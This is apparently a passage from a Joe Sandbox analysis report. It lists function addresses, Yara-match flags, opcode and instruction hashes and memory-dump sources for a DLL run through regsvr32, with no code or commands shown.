                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X
                                                                                                                                • API String ID: 0-1684620495
                                                                                                                                • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                                                                                • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800095DC Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: GfMu
                                                                                                                                • API String ID: 0-241548529
                                                                                                                                • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                                                                                • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000F9E8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: k|
                                                                                                                                • API String ID: 0-998972391
                                                                                                                                • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                                                                                • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001D950 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: wz_
                                                                                                                                • API String ID: 0-2163964638
                                                                                                                                • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                                                                                • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000580C Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: {?Q
                                                                                                                                • API String ID: 0-927583641
                                                                                                                                • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                                                                                • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180021510 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: |}6\
                                                                                                                                • API String ID: 0-3074799505
                                                                                                                                • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                                                                                • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001FA38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 3&a
                                                                                                                                • API String ID: 0-537350193
                                                                                                                                • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                                                                                • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001435C Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: o0:X
                                                                                                                                • API String ID: 0-645126758
                                                                                                                                • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                                                                                • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180020CFC Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: D4}
                                                                                                                                • API String ID: 0-491520632
                                                                                                                                • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                                                                                • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9AA0C Relevance: .3, Instructions: 260COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1583075380-0
                                                                                                                                • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                • Instruction ID: 92953a5af30ae2a77564380b2c39725e4362f7166b853fc33fdaac9354d1789b
                                                                                                                                • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                • Instruction Fuzzy Hash: B0A1B132B1868342EB649F3696157BEB3A6EB85BD0F448135DE4D5BAE9CF3CE0118301
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9EB60 Relevance: .2, Instructions: 202COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                • Instruction ID: 70989dc1c7b0955b44ba62b06870f64af454fefcadc428673f0cc11b0aa956f2
                                                                                                                                • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                • Instruction Fuzzy Hash: 4371AEB2F185474BD35C8B28E95177876E6EBE4314F589035D90ACAAF9EE39F9008701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180018598 Relevance: .2, Instructions: 197COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                                                                                • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000F7E0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                                                                                • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001DBE8 Relevance: .2, Instructions: 153COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                                                                                • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180019300 Relevance: .1, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                                                                                • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001CD38 Relevance: .1, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                                                                                • Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800197A0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                                                                                • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180008AD8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                                                                                • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180009F5C Relevance: .1, Instructions: 107COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                                                                                • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000F917 Relevance: .1, Instructions: 99COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                                                                                • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180019E78 Relevance: .1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                                                                                • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180001FE0 Relevance: .1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                                                                                • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180015CB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                                                                                • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9A77C Relevance: .1, Instructions: 85COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _getptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3186804695-0
                                                                                                                                • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                • Instruction ID: 6f50323f4729ea5ba3736779dd0e048ec9f03dd86f551d69ad493ef00039cb1b
                                                                                                                                • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                • Instruction Fuzzy Hash: 7231AF22A1868281EB54DB3AD4593AA77E5EB85BD0F584136EA4D4B7F6DF3CD001C701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000C4B4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
